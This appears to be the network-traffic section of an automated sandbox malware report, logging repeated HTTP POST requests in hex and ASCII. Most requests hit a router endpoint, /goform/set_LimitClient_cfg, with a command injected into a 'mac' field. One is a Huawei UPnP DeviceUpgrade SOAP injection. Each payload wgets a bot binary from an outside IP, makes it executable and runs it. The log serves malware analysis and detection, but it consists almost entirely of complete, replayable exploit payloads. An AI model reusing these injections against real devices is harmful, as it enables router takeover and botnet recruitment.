                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
